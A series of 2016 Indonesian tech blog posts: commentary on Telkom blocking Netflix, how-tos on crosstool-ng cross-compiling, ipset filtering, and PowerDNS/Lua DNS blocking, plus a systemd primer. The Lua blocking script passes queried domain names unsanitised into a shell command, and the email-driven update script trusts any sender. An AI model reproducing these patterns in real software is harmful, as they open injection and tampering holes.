Pada tanggal 27 Januari lalu, Telkom Indonesia mengumumkan bahwa layanan Netflix diblokir melalui jaringan Telkom. Telkom beralasan bahwa Netflix belum comply dengan regulasi di Indonesia. Selain itu Telkom juga mengatakan bahwa Netflix bisa diakses asalkan mau bekerjasama dengan Telkom.

Pada tanggal 22 Maret lalu juga terjadi demo anarkis oleh para driver taksi konvensional menuntut agar layanan taksi online dibubarkan.

Dua kejadian berbeda, industri yang berbeda tapi mempunyai pola yang sama. Pertanyaanya, apa yang sebenarnya terjadi? Mungkin saja, untuk menjawab pertanyaan tersebut tidak semudah kelihatannya, mungkin juga diperlukan para ahli dibidangnya, dan saya bukan salah satu dari para ahli tersebut. Dibawah Saya coba menuliskan pendapat subjektif Saya mengenai masalah ini.

Saya jadi teringat nama Alvin Toffler dan idenya tentang “The Third Wave”, saya belum pernah membaca buku tersebut dan hanya mengetahuinya dari random blog yang Saya baca [1]. Alvin Toffler berpendapat bahwa peradaban manusia seperti gelombang, dan pada saat ini peradaban manusia memasuki yang disebut gelombang ketiga (The Third Wave). First wave, atau gelombang peradaban yang pertama adalah Agrikultur. Gelombang kedua adalah revolusi industri, ditandai dengan munculnya banyak industri dan korporasi. Third wave, gelombang ketiga adalah post industrial age, atau era informasi yang saat ini kita ada di dalamnya.

Awal tahun 2000-an, muncul fenomena yang disebut dot-com bubble. Banyak industri berbasis tekonologi IT lahir pada era ini, sebagian dari industri ini bahkan lahir dari garasi. Kemudian sekarang ini juga muncul istilah-istilah yang asing di dunia teknologi informasi seperti Big Data, Internet of Thing, Cloud Computing, dsb.

Dalam dunia teknologi informasi, ada sebuah hukum yang disebut Moore’s Law atau Hukum Moore [2]. Ide ini berasal dari Gordon Moore, mengatakan bahwa komponen semikonduktor seperti kapasitor, transistor, resistor, dan dioda dalam sebuah Integrated Circuit jumlahnya meningkat dua kali lipat dalam dua tahun. Bisa kita bayangkan, satuan terkecil dalam komputasi adalah bit dan dalam sebuah memory, 8 bit membentuk 1 byte. Jumlah transistor per bit berbeda atara teknologi yang satu dengan lainnya, ada yang memerlukan 4 buah transistor per bit nya, ada pula yang satu transistor untuk 2 bit tapi kalau kita anggap satu bit diwakili oleh satu transistor, maka delapan buah transistor untuk 1 byte. Untuk satu buah memory yang kapasitasnya 1 GB, berarti ada 8 milyar transistor, 8 milyar transistor dalam sebuah chip yang ukurannya begitu kecil.

Pada saat ini, memory 1 GB tentunya tergolong kecil. Tapi beberapa tahun lalu, saya ingat sekitar tahun 2007 waktu itu Saya punya flash drive yang kapasitasnya hanya 256 MB, pada saat itu kapasitas 1 GB terasa mewah sekali, ini membuktikan Hukum Moore diatas.

Apa yang coba saya sampaikan adalah, bahwa evolusi teknologi ini berjalan begitu cepat, dan karena saking cepatnya sehingga banyak yang kewalahan mengejarnya dan akhirnya tertinggal. Kita paham bahwa dalam proses evolusi, evolusi apa saja pasti memakan korban, yaitu siapa yang gagal beradaptasi akan tereliminasi dengan sendirinya. Kita lihat sendiri bagaimana Yahoo atau sosial media jadul seperti Friendster yang begitu populer di awal 2000-an sekarang hampir tidak terdengar namanya. Atau seperti smartphone Blackberry yang seakan-akan kemarin semua orang membicarakannya, tapi sekarang sudah tergantikan smartphone berbasis Android. Saya sendiri, tahun 2013 lalu pernah beli smartphone Android yang Saya anggap wah sekali pada waktu itu, tapi sekarang sudah obsolete dan harus pakai yang lebih baru lagi kalau tidak mau dianggap manusia zaman batu. Tapi meskipun begitu, paling tidak Saya tidak demo turun ke jalan menuntut produksi smartphone dihentikan.

Mari kita lihat masalah ini dari kacamata engineering. Proses engineering itu, engineering dalam disiplin ilmu apapun, sebagian besar polanya sama. Proses engineering berawal dari adanya masalah, kemudian dengan cara-cara yang kreatif dan inovatif mencoba menyelesaikan masalah tersebut, dan kemudian seperti sulap jadilah produk yang belum pernah ada sebelumnya.

Ambil contoh kendaraan, mobil atau sepeda motor. Mobil dan sepeda motor merupakan produk engineering, yang lahir sebagai solusi dari beberapa masalah, salah satunya saja misalnya untuk perjalanan jarak jauh dengan waktu yang cepat. Sebelum ada kendaraan dengan mesin, perjalanan jauh mungkin saja dengan berjalan kaki atau kereta kuda misalnya, mobil dan motor jadi solusi masalah tersebut.

Karena itu, hasil dari proses engineering untuk bisa diterima sebagai solusi paling tidak harus memenuhi beberapa hal yaitu desirability, feasibility, dan viability. Desirability artinya solusi itu benar-benar dibutuhkan dan diinginkan. Untuk orang-orang yang lebih suka naik sepeda misalnya, sepeda motor tentu bukan solusi. Viability, artinya dapat dijangkau, mobil tentu saja desirable atau lebih diminati tapi ternyata tidak semua orang mampu beli mobil. Feasibility, artinya solusi engineering itu bisa diwujudkan. Kalau saja manusia bisa melakukan teleportasi dari satu tempat ke tempat lain, tentu itu lebih desirable daripada menggunakan kendaraan, tapi sampai saat ini teleportasi belum bisa diwujudkan, mungkin nanti.

Kembali ke masalah taksi konvensional versus taksi online atau Telkom versus Netflix. Dua-duanya merupakan hasil dari proses engineering, tapi ternyata yang satu lebih diminati daripada yang lain, desirability. Gojek misalnya, kita kesampingkan dulu masalah legalitasnya, adalah solusi yang lahir dari proses engineering, begitu juga Netflix. Faktor kemudahan dan kenyamanan adalah problemnya, dan baik Gojek maupun Netflix mampu melihat itu dan mampu memberikan solusi yang lebih diminati masyarakat. Jadi, menuntut Grab, Uber, atau Gojek ditutup atau Telkom yang memblokir Netflix adalah cara yang menurut Saya, sekali lagi menurut saya tidak logis.

Kesimpulannya, kemajuan teknologi tidak dapat dihentikan karena akan terus berevolusi. Karena itu, akan muncul masalah-masalah baru dan akan muncul solusi-solusi engineering yang baru dan inovasi mutlak diperlukan kalau tidak ingin tertinggal dibelakang. Pada akhirnya, masyarakat lah yang memilih mana yang lebih baik, bukan tangan besi atau monopoli.

Refs:

Linux cross-compile dengan crosstool-ng

2016-03-27T14:35:00+08:00

Pada artikel ini, saya coba menuliskan langkah-langkah membuat toolchain untuk cross compile program Linux. Os yang dipakai Debian Jessie, tentu saja applicable untuk selain Debian, sedangkan toolchain yang dipakai menggunakan crosstool-ng.

Sebelum ke how-to, ada baiknya dituliskan sedikit penjelasan tentang hal-hal yang berkaitan dengan cross-compile.

Architecture

Setiap CPU (Central Processing Unit) dibuat menurut architecture tertentu, dan setiap architecture berbeda dalam mengeksekusi program [1]. Beberapa contoh cpu architecture yang banyak dipakai diantaranya ada architecture x86, ini merupakan cpu 32 bit yang banyak dipakai di komputer desktop, laptop, serta server. Kemudian ada x86_64, prosesor architecture x86 versi 64 bit. Produk dari Intel dan AMD banyak dipakai untuk dua architecture tersebut.

Kemudian ada architecture ARM, dan seperti x86, ARM adalah 32 bit sedangkan ARM64 untuk yang 64 bit. Prosesor ARM banyak dipakai di system embed dan handheld seperti smartphone, sebagian besar smartphone yang ada saat ini menggunakan cpu ARM.

Selain x86 dan ARM, ada processor architecture yang terkenal di embedded system yaitu MIPS. MIPS banyak dipakai di sistem embed untuk jaringan seperti router dan switch. Beberapa router dan switch seperti Cisco, Ubiquiti dan MikroTik menggunakan MIPS.

Endianness

Setiap cpu, cara mengatur susunan byte (byte order) dalam memory berbeda-beda dan dikelompokkan menjadi dua bagian, little endian dan big endian [2]. Little dan big endian tidak ada pengaruhnya untuk data di memory yang besarnya hanya satu byte (8 bit), bedanya adalah ketika data di memory merupakan multiple byte atau lebih dari satu byte. Big endian (big-end) menyusun dan menginterpretasikan bahwa byte pertama atau byte paling awal adalah byte terbesar, sedangkan litte endian (little-end) sebaliknya.

Contoh untuk tipe data short integer yang besarnya 2 byte. Artinya ada 2 lokasi memory (satu blok memory besarnya 1 byte / 8 bit) yang apabila data dari dua lokasi memory itu dijumlahkan akan membentuk satu data short integer. Byte pertama berisi 0x12 atau 18 dalam desimal, byte kedua berisi 0x34 atau 52 dalam desimal.

Big endian mengartikan byte pertama adalah yang terbesar sehingga kalkulasinya adalah

18 x (2 ^ 8) + 52 = 4660

Sedangkan little endian mengartikan bahwa byte terakhir adalah yang terbesar, pertama yang terkecil, sehingga:

18 + 52 x (2 ^ 8) = 13798

Dari sini terlihat, kalau salah mengartikan endianness, maka hasil program pun akan salah.

Compiled language

Ada dua tipe program yang ada di komputer, yaitu tipe interpreted dan compiled. Program yang termasuk dalam tipe interpreted language tidak perlu di-compile dan biasanya disebut bahasa scripting, beberapa contoh ada bahasa Python, Perl, PHP, dsb.

Berbeda dengan interpreted language, bahasa tipe compiled language harus di-compile sebelum bisa dieksekusi atau dijalankan. Yang termasuk kategori ini diantaranya bahasa C, C++, Pascal, dsb. Program compiled biasanya berjalan lebih cepat daripada tipe interpreted language.

Proses kompilasi adalah proses menerjemahkan bahasa pemrograman yang dipahami manusia kedalam bahasa yang dipahami oleh cpu, program untuk meng-compile program disebut compiler. Berbeda dengan bahasa interpreted yang cukup sekali ditulis dan bisa berjalan di cpu apapun, bahasa compiled harus menyesuaikan tipe cpu yang dipakai.

Cross compile

Dalam proses compile program, ada tiga tipe cpu yang dipakai.

Build, Build host adalah cpu dimana compiler dibuat.
Host, Host merupakan cpu dimana compiler akan digunakan untuk meng-compile program.
Target, Target merupakan cpu dimana program yang sudah di-compile akan berjalan.

Biasanya, untuk compile di komputer x86 dan yang semisalnya, build, host, dan target adalah komputer yang sama. Artinya compiler dibuat di komputer tersebut, kemudian compiler dijalankan di komputer tersebut untuk meng-compile program, dan program yang sudah di-compile akan berjalan di komputer itu.

Sedangkan untuk system embed, prosesnya berbeda. embedded system biasanya dibuat dengan sangat efisien dan resource yang terbatas. Contohnya beberapa jenis router SOHO yang mempunyai prosesor MIPS dengan speed hanya 400 MHz, memory 32 MB, dan storage 64MB. Dengan resource seperti ini tentu saja tidak mungkin kompilasi program dilakukan di router tersebut.

Proses cross-compile adalah proses meng-compile program dengan target cpu arhitecture yang berbeda. Misalnya, program di-compile di mesin Intel x86 seperti laptop atau komputer desktop, tapi program hasil kompilasi akan digunakan di cpu MIPS seperti router. Tools atau program-program yang digunakan untuk melakukan cross-compile disebut toolchain.

Toolchain dibentuk dengan beberapa program, diataranya:

binutils, Program untuk memanage program binary, contohnya ld sebagai linker.
gcc, koleksi compiler yang dibuat oleh GNU.
C library untuk embedded system biasanya menggunakan uclibc meskipun ada juga yang menggunakan glibc.

Proses membuat toolchain merupakan proses yang sangat kompleks dan memerlukan usaha trial and error yang tidak mudah [3]. Thanks to FOSS community, kita tidak perlu melalui proses yang rumit itu. Salah satunya crosstool-ng, tool ini melakukan proses otomasi membuat toolchain seperti patching, compiling, dan linking. Dengan crosstool-ng kita bisa dengan mudah tinggal menjalankan script, memberikan input dan setelah proses selesai, toolchain sudah jadi dan siap digunakan untuk meng-compile program.

Crosstool-ng

Sebelum proses building, kita perlu mengetahui beberapa parameter untuk crosstool-ng, diantaranya cpu architecture, endianness, c library yang dipakai. Untuk case saya beberapa waktu lalu, cpu architecture MIPS 64 bit, c library menggunakan GNU libc versi 2, dan big endian.

Untuk mencari endianness, ketik lscpu di terminal:

Architecture:          mips64
Byte Order:            Big Endian
CPU(s):                2
On-line CPU(s) list:   0,1
Thread(s) per core:    1
Core(s) per socket:    1
Socket(s):             2
L1d cache:             32K
L1i cache:             37K
L2 cache:              1024K

Output dari Byte Order adalah Big Endian.

Pada beberapa system, command lscpu tidak ada sehingga menggunakan cara lain untuk mengetahui endianness

$ ## Big endian output 0
$ echo -n I | od -to2 | awk 'FNR==1{ print substr($2,6,1)}'
$ 0
$
$ ## Output 1 untuk little endian
$ echo -n I | od -to2 | awk 'FNR==1{ print substr($2,6,1)}'
$ 1

Untuk mengetahui cpu architecture dan OS, contoh output untuk notebook saya yang 32 bit

uname -a
Linux DEATH-STAR 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u1 (2015-12-14) i686 GNU/Linux

Setelah parameter diketahui, berikutnya ke proses build.

Untuk Debian dan sejenisnya, pastikan paket build-essential sudah terinstall

dpkg -l | grep build-essential

# jika belum terinstall
apt-get install build-essential

Download crosstool-ng, versi terakhir saat artikel ini ditulis adalah 1.22

wget http://crosstool-ng.org/download/crosstool-ng/crosstool-ng-1.22.0.tar.bz2

Extract tarball dan compile crosstool-ng

tar -xvjf crosstool-ng-1.22.0.tar.bz2
cd crosstool-ng-1.22
./configure --prefix=/usr/local
make

# dengan user root
make install

crosstool-ng sudah terinstall di /usr/local. Selanjutnya buat direktori untuk toolchain. Direktori untuk toolchain dalam contoh ini dinamai crosstool dengan subdirektori build untuk proses build dan subdirektori target untuk toolchain yang sudah siap digunakan.

mkdir -p ~/crosstool/{build,target}
cd ~/crosstool/build
ct-ng list-samples

Dari output sample, yang paling mendekati adalah mipsel-unknown-linux-gnu. mipsel-unknown-linux-gnu adalah contoh konfigurasi untuk target mips little endian dengan c library gnu libc. Karena target dalam kasus ini berbeda, target endianness big endian, maka konfigurasi perlu disesuaikan dengan ct-ng menuconfig

ct-ng show-mipsel-unknown-linux-gnu
ct-ng mipsel-unknown-linux-gnu

ct-ng menuconfig

Di bagian paths and misc options, sesuaikan target direktori sesuai dengan yang sudah dibuat diatas

(${HOME}/crosstool/target) Prefix directory

Di bagian Target Options, ubah endianness ke Big Endian. Pilih exit kemudian save. Setalah itu build toolchain dengan command ct-ng build

ct-ng build

Command ct-ng build akan secara otomatis mendownload tool yang diperlukan seperti binutils, gcc, libc, dsb. ct-ng build juga akan melakukan patching source code dan kemudian compile secara otomatis. Proses ini cukup lama, lebih dari 2 jam dengan prosesor Intel Atom, prosesor yang lebih tinggi seharusnya lebih cepat.

Setelah selesai, toolchain sudah ada di direktori ~/crosstool/target dan sudah bisa digunakan

export PATH=$PATH:$HOME/crosstool/target/bin

# Tes compile program
mips-unknown-linux-gnu-gcc -g -Wall program.c -o program

Program yang sudah di-compile dengan crosstool-ng tinggal di-copy ke mesin target, di-set execution bit nya dan bisa dijalankan.

Refs:

Filter massive ip address di Linux

2016-03-21T13:23:00+08:00

Traffic policy merupakan hal yang umum di jaringan, salah satu praktiknya untuk menerapkan policy yang berbeda antara yang berasal dari network A dan network B. Pada router berbasis Linux, biasanya menggunakan Iptables untuk filtering.

Problemnya adalah ketika ip address atau network prefix yang difilter sangat banyak, dalam kasus ini prefix mendekati 100 ribu network prefix. Dengan Iptables tidak akan bisa karena pertama, performance degradation dan yang kedua akan muncul pesan error memory allocation failed karena terlalu banyak rule. Karena itu, ipset yang digunakan bersamaan dengan iptables.

Hardware yang kami gunakan sebagai router adalah hardware server dengan 8 core prosesor Intel Xeon. Sistem operasi router menggunakan Vyatta, router ini menjalankan dynamic routing protocol BGP full prefix dari beberapa network provider dan OSPF untuk interior gateway protocol.

Sedikit tentang Vyatta, Vyatta adalah sistem operasi router yang berbasis Debian dan mempunyai command line interface yang mirip dengan Juniper JunOS. Vyatta awalnya merupakan project Open Source, tapi pada tahun 2012 Vyatta diakuisisi oleh Brocade dan tidak lagi Open. Pada tahun 2013, para developer komunitas Vyatta membuat project sistem operasi Open Source berbasis Vyatta dengan nama VyOS.

Karena Vyatta merupakan OS berbasis Debian, maka repository pun menggunakan bisa menggunakan Debian. Instalasi ipset cukup dengan apt-get

apt-get install ipset

Setelah ipset terinstall, langkah selanjutnya adalah membuat nama ipset dan memasukkan ip address ke set tersebut. Disini set menggunakan nama NETLIST. Ada beberapa mode hash yang harus dipilih dalam membuat set, untuk list ip address bisa menggunakan hash ip, untuk network prefix menggunakan hash net. Kemudian, secara default maximum list dalam set adalah 64 ribu, jadi kalau list melebihi 64 ribu harus di set secara eksplisit.

ipset create NETLIST hash:net maxelem 100000

NETLIST : Nama ip set.
hash:net : Set ipset menggunakan network prefix.
maxelem 100000 : Set maksimum list entry sebanyak 100 ribu.

Setelah itu input network prefix ke set

ipset -A NETLIST 192.168.1.0/24
ipset -A NETLIST 172.16.3.0/24
...

Untuk list yang banyak sekali, lebih gampang menggunakan script.

Setelah NETLIST terisi dengan prefix atau ip address, tinggal matching iptables. Misalnya untuk set dscp traffic yang berasal dari ip address yang ada di NETLIST.

iptables -t mangle -A PREROUTING -m set --match-set NETLIST src -j DSCP --set-dscp-class AF11

-t mangle -A PREROUTING : Tambahkan rule di table mangle chain PREROUTING.
-m set : Match ipset
--match-set NETLIST src : Match source address dari ipset NETLIST.
-j DSCP : Jump ke target DSCP.
--set-dscp-class AF11 : Set dscp 0x0a.

Dengan ipset yang berisi hampir 100 ribu prefix, hasil tes dengan hardware spesifikasi diatas tidak ada degradasi performance, hanya penambahan delay sekitar 1 mili detik.

Terakhir, seperti halnya iptables, ipset hanya tersimpan di volatile memory dan hilang setelah reboot. Cara untuk membuat rule persistent tidak dibahas di artikel ini.

Filter website negatif dengan Linux dan Powerdns.

2016-02-28T14:31:00+08:00

Ini how-to yang quick and dirty, bagaimana cara blokir dns situs-situs negatif dengan Powerdns dan Lua.

Di beberapa institusi, misalnya kampus, sekolah atau yang lain, situs-situs negatif seperti pornografi dan yang lain lebih baik untuk difilter. Dari sekian banyak cara blokir content negatif, salah satu cara adalah dengan blokir melalui dns. Meskipun dengan blokir dns user masih bisa dengan cara-cara lain mengakses konten negatif, tapi paling tidak blokir dns bisa mengurangi traffic ke situs-situs negatif tersebut.

Ada beberapa opsi untuk blokir situs negatif dengan dns, free service seperti Nawala atau OpenDNS bisa digunakan. Cara blokir dibawah ini bisa digunakan kalau ada server Linux lokal yang dimanfaatkan sebagai dns server.

DNS

Ada dua mode dalam dns service, yaitu recursor dan authoritative. Recursor fungsinya melakukan query ke root server untuk memetakan nama domain ke ip address. Sedangkan authoritative berfungsi sebagai nameserver. Misalnya untuk Google, free service dns recursor Google di server 8.8.8.8 dan 8.8.4.4 sedangkan untuk authoritative nameserver google.com di ns(1|2|3|4).google.com.

Powerdns

Untuk blokir melalui dns, yang diperlukan hanya dns recursor sedangkan authoritative nameserver tidak diperlukan. Ada banyak dns recursor yang bisa dipakai, beberapa yang banyak digunakan yaitu bind9, dnsmasq, dan Powerdns recursor. Di artikel ini menggunakan Powerdns recursor.

Situs-situs pornografi jumlahnya banyak, banyak sekali bahkan. Kalau kita ambil data dari situs Trust Positif Kominfo, ada lebih dari 700 ribu situs yang seharusnya diblokir. Karena itu, pilihan dns recursornya juga menyesuaikan.

Saya tidak gunakan Bind9 atau Dnsmasq dengan beberapa pertimbangan. Konfigurasi file teks Bind9 untuk 700 ribu lebih record sepertinya menyusahkan, Dnsmasq meskipun bagus untuk skala kecil, tapi untuk data sebanyak itu start-up nya jadi lebih lama.

Powerdns sangat cocok karena bisa menggunakan backend database SQL. Jadi record domain yang diblokir bisa disimpan di database. Tapi problem muncul kemudian ketika harus upgrade server atau pindah server, backup dan restore database dengan data ratusan ribu record jadi tidak efisien. Untuk itu, saya putuskan untuk kembali ke konsep KISS, Keep It Simple Stupid!, abaikan saja kata stupidnya.

Satu fitur di Powerdns yang saya manfaatkan adalah scripting dengan bahasa Lua. Jadi dengan script ini kita bisa memanipulasi hasil dns query dengan hasil script Lua, silahkan baca tentang Lua di http://www.lua.org/

Metode saya sederhana saja, nama-nama domain yang diblokir disimpan di file plaintext. Kemudian dengan script Lua, Saya eksekusi command grep. Kalau return value dari grep True, berarti domain masuk dalam list blokir dan False jika sebaliknya.

How-to

Di artikel ini, direktori Powerdns ada di /etc/powerdns dan nama file yang berisi domain-domain yang diblok ada di /etc/powerdns/blacklist, silahkan disesuaikan.

Pertama, install Powerdns dan Lua kalau belum ada

apt-get install pdns-recursor lua5.2

Command diatas untuk Debian 8, untuk distibusi lain silahkan disesuaikan. Paket Lua5.2 sebenarnya tidak diperlukan, hanya diperlukan untuk testing script.

Setelah pdns-recursor terinstall, edit file /etc/powerdns/recursor.conf.

vim /etc/powerdns/recursor.conf

Vim bisa diganti dengan editor lain, nano misalnya. Banyak parameter di recursor.conf, tapi untuk keperluan ini cukup allow-from dan lua-dns-script

Comtoh file recursor.conf

# allow-from untuk memfilter network mana saja yang boleh query ke server ini.
# Misal network internal 192.168.1.0/24, maka tambahkan network tersebut ke allow-from

allow-from=127.0.0.0/8, ::1/128, fe80::/10, 192.168.1.0/24

# lua-dns-script diisi dengan lokasi script Lua untuk Powerdns.

lua-dns-script= /etc/powerdns/script.lua

Berikutnya, kita perlu mendownload data dari server Trust Positif dan menulis script Lua.

curl "http://trustpositif.kominfo.go.id/files/index.php?download=blacklist%2Fporn%2Fdomains&share=11" > /etc/powerdns/blacklist

Setelah download dengan command diatas, di direktori /etc/powerdns sudah ada file dengan nama blacklist yang berisi nama-nama domain yang di blokir oleh Kominfo.

Selanjutnya, script Lua di /etc/powerdns/script.lua

--- function preresolve dieksekusi oleh pdns-recursor
--- sebelum query ke root server
--- kita tempatkan blacklist di function ini

function preresolve (ip, domain, qtype)
---     Kita hanya akan memeriksa query dengan tipe record A
        if qtype == pdns.A
        then
                dom = domain:match("%w+%.%w+.$")

                if dom == nil
                then
                        dom = "NXDOMAIN."
                end

---             Hilangkan tanda . (dot) dibelakang query domain
---             google.com. menjadi google.com
                dom = string.sub(domain, 1, string.len(domain) - 1)

---             File berisi nama-nama domain yang diblokir
                file = "/etc/powerdns/blacklist"

---             Eksekusi perintah grep, apabila return value == true, maka
---             situs terblokir dan hasil query akan diarahkan ke web server
---             dengan halaman blokir. IP address web server disini
---             menggunakan 192.168.1.1, apabila berbeda
---             silahkan disesuaikan.
                if os.execute(string.format("grep \"^%s$\" %s >/dev/null", dom, file)) == true     
                then
                        addr = "192.168.1.1"
                        ret={
                                {qtype=1, ttl=60,  content=addr}
                        }
                        return 0, ret
                else
                        return -1, {}
                end

        end
        return -1, {}
end

Sampai disini seharusnya dns server sudah bisa dipakai

systemctl restart pdns-recursor

Jika tidak ada error, tes query dari localhost

dig google.com @localhost

Tes juga query domain yang diblokir

dig playboy.com @localhost

Jika hasilnya seperti dibawah, maka sudah benar

;; ANSWER SECTION:
playboy.com.        60  IN  A   192.168.1.1

Update data

Problem selanjutnya yang muncul adalah bagaimana cara menambah atau menghapus data. saya pikir agak merepotkan kalau setiap kali menambah atau menghapus data harus login ke server kemudian edit file secara manual.

Untuk itu, saya membuat script sederhana dengan Python dan pop3 module. Dengan script ini, Saya bisa menambah atau mengurangi data domain yang diblokir dengan cara kirim email. Script Python ini fungsinya mengecek email setiap 10 menit sekali, kemudian jika ada email maka data akan di-update tergantung subject email, Saya gunakan subject [dns add] untuk menambah dan [dns del] untuk menghapus. Untuk nama-nama domainnya di list di body teks email, satu domain per baris.

Script ini diberi nama ckmail dan ditempatkan di /usr/local/bin. Script ini dieksekusi oleh cron setiap 10 menit.

#!/usr/bin/env python

import poplib
import re
import os.path as op
from os import remove
from shutil import move

DELETE      = 0x01
ADD         = 0x02
CMD         = 0x00

DIR = "/etc/powerdns/"
FILE = "blacklist"

def checkhdr(mail):
        global CMD
        global ADD
        global DELETE

        qa = re.compile("(S|s)ubject:[ \t]+\[dns add\].*")
        qd = re.compile("(S|s)ubject:[ \t]+\[dns del\].*")
        j = 0

        for i in mail:
                if j <= 50:
                        if re.search(qa, i):
                                CMD |= ADD
                                return True
                        if re.search(qd, i):
                                CMD |= DELETE
                                return True
                j += 1

        return 0

# end chkhdr()

def addlist(domain):
        f = DIR + FILE

        fsock = open(f, "a")
        for i in domain:
                fsock.write(i + "\n")
        fsock.close()

        return True

# end addlist

def remlist(domain):
        f = DIR + FILE
        f2 = DIR + "." + FILE

        if op.isfile(f):
                move(f, f2)
        else:
                return False

        fsockr = open(f2, "r")
        fsockw = open(f, "a")

        while 1:
                i = fsockr.readline()
                if i:
                        m = 0
                        for j in domain:
                                if i == j + "\n":
                                        m = 1
                                        break

                        if m == 0:
                                fsockw.write(i)
                else:
                        break

        fsockr.close()
        fsockw.close()

        remove(f2)
        return True

# Server, username dan password
srv = "pop3.example.com"
user = "user@example.com"
passwd = "password"

POP = poplib.POP3_SSL(srv)
POP.user(user)
POP.pass_(passwd)
mailnum = POP.stat()[0]

for i in range(mailnum):
        i += 1
        mail = POP.retr(i)[1]

        if checkhdr(mail):
                q = re.compile("^[a-zA-Z0-9]+[a-zA-Z0-9-_.]+\.[a-z]{2,4}$")
                dom = []
                for j in mail:
                        if re.search(q, j):
                                dom.append(j)

                if (CMD & ADD) > 0:
                        addlist(dom)
                if (CMD & DELETE) > 0:
                        remlist(dom)

                POP.dele(i)

POP.quit()

That’s it, cara yang quick and dirty dan tentunya metode ini jauh dari kata elegan.

Pengenalan systemd

2016-02-21T10:41:00+08:00

systemd, ditulis dengan huruf kecil, adalah init system baru di Debian Jessie dan belum pernah ada di versi Debian sebelumnya. Tulisan ini adalah sedikit apa yang saya ketahui dari systemd di Debian 8.

Para pengguna Debian mungkin saja sudah tahu bahwa keputusan Debian untuk mengadopsi systemd sebagai init system melalui perdebatan yang panjang antara pro systemd dan kontra systemd yang akhirnya menyebabkan para developer Debian terpecah menjadi dua kubu.

Kontroversi systemd

systemd memang mejadi kontroversi karena beberapa hal. Pertama, sebagian orang menganggap systemd tidak menghormati filosofi Unix. saya ingat ketika awal sekali mengenal Linux, bahwa Linux adalah sistem operasi yang Unix-like dan Unix terkenal dengan filosofi-nya, diantaranya:

Tugas sebuah program adalah melakukan satu hal dan melakukannya dengan baik.
Sistem yang besar dan kompleks merupakan gabungan dari program-program kecil yang bekerja bersama.
Teks adalah interface yang universal
Segalanya di Unix adalah file.

systemd dianggap tidak conform dengan filosofi Unix diatas sehingga banyak yang menolaknya. systemd awalnya di-develop oleh Lennart Poettering, developer yang sekarang bekerja untuk Red Hat. Lennart Poettering sebelumnya juga membuat program yang kontroversial yaitu Avahi dan PulseAudio. Silahkan baca tentang Lennart Poettering di halaman Wikipedia

Beberapa kritik terhadap systemd, systemd tidak hanya menjadi init system tapi juga mengambil alih banyak fungsi. Misalnya systemd berusaha mengatur network, cron, fstab, syslog/rsyslog, dll. Artinya systemd bukanlah sebuah program yang melakukan satu hal saja, tapi banyak hal. Kemudian, systemd dikritik karena logging filenya tidak berbasis teks seperti Unix dan Linux log pada umumnya, tapi binary log file.

Diantara kritik terhadap systemd ada beberapa yang tidak valid, misalnya saja systemd dianggap tidak modular. Lennart Poettering menjawab kritik yang seperti ini di halaman blognya dengan judul The Biggest Myths

Lahirnya Devuan GNU/Linux

Di Debian sendiri, setelah perdebatan panjang, systemd menjadi default init system di rilis Debian mulai Debian 8. Debian termasuk terlambat karena beberapa distribusi Linux sebelumnya sudah menggunakan systemd seperti Red Hat dan Fedora, Ubuntu, Gentoo, dll.

Akibat dari keputusan ini, beberapa developer Debian yang menolak systemd membuat distribusi baru berbasis Debian, Debian tanpa systemd yang diberi nama Devuan. Devuan adalah Debian yang masih menggunakan sysvinit, tentang Devuan bisa dilihat di https://devuan.org/

Bagi user seperti Saya, systemd atau bukan systemd tidak banyak pengaruhnya kecuali mempelajari command-command baru. Dan ini pendapat saya setelah beberapa waktu menggunakan Debian 8 dan systemd.

systemd adalah sistem yang modular. Di Debian 8, implementasi systemd hanya init system dan journal log. Debian menjaga backward compatibility dengan sysvinit, dan antara journal dan rsyslog. Artinya, dari sisi user tidak ada bedanya karena user tetap bisa menggunakan sysvinit dan logging menggunakan rsyslog, command service <service> (start|stop|restart) tetap bisa digunakan. systemd memang menawarkan banyak fitur seperti networking, cron, dsb tapi itu semua optional, satu-satunya fitur yang tidak bisa dipisahkan dari systemd adalah journald untuk system log, itu pun tidak mematikan service rsyslog dan rsyslog tetap bisa digunakan.

systemd adalah sistem yang modern, berbanding terbalik dengan sysvinit. Sysvinit memang sudah seharusnya hilang dari dunia per-init-an karena mangatur service melalui script itu tidak mudah dan tidak teratur. Ubuntu pernah membuat pengganti Sysvinit dengan Upstart, tapi kemudian ditinggalkan dan beralih ke systemd. systemd menggunakan file konfigurasi yang disebut unit, cara membuat file unit pun gampang karena konfigurasinya yang ini-style.

Yang menurut saya kurang adalah sistem logging dengan journald karena file log-nya bukan teks. Sebelumnya, dengan teks logging rsyslog bisa menggunakan tool apa saja seperti cat, grep, tail, atau head, tapi dengan journald hanya bisa menggunakan satu tool yaitu journalctl.

Command-command systemd

Beberapa command systemd yang sering digunakan.

Untuk me-restart service, systemctl restart. Misalnya merestart apache2

systemctl restart apache2

systemctl juga bisa me-restart beberapa service sekaligus, untuk restart apache2 dan mysql

systemctl restart apache2 mysql

Untuk start, stop dan reload, tinggal ganti restart dengan start, stop atau reload.

Mengaktifkan service saat start-up, misal mengaktifkan service systemd-networkd

systemctl enable systemd-networkd

Menonaktifkan service saat start-up, misal menonaktifkan service networking

systemctl disable networking

Restart

systemctl reboot

Shutdown

systemctl poweroff

Melihat tanggal dan jam

timedatectl

Set waktu

timedatectl set-time "2016-02-21 22:33:44"

Melihat log secara live

journalctl -f

Melihat log untuk service, email server postfix misalnya

journalctl -u postfix

Melihat log dari tanggal 20 sampai 21 Februari

journalctl --since "2016-02-20" --until "2016-02-21"

Melihat log dua jam terakhir

journalctl --since "2 hours ago"

Masih banyak lagi tentang systemd yang tidak tertulis disini dan belum saya ketahui. Manual untuk systemd bisa dibaca di https://www.freedesktop.org/software/systemd/man/

Hacker dalam kultur korporat

2016-02-05T05:03:00+08:00

Kata “hacker” yang saya gunakan dalam artikel ini merujuk pada arti kata hacker versi hacker, bukan hacker versi yang lain. Hacker yang dimaksud disini bukan mereka dengan topeng anonymous, pengguna Kali Linux yang hobinya melakukan vandalisme merusak website atau mencuri kartu kredit.
Mungkin saja belum paham bedanya, silahkan baca artikel yang ditulis oleh pak RSW tentang meluruskan salah kaprah tentang hacker atau essay dalam bahasa Inggris oleh Paul Graham The Word “Hacker”

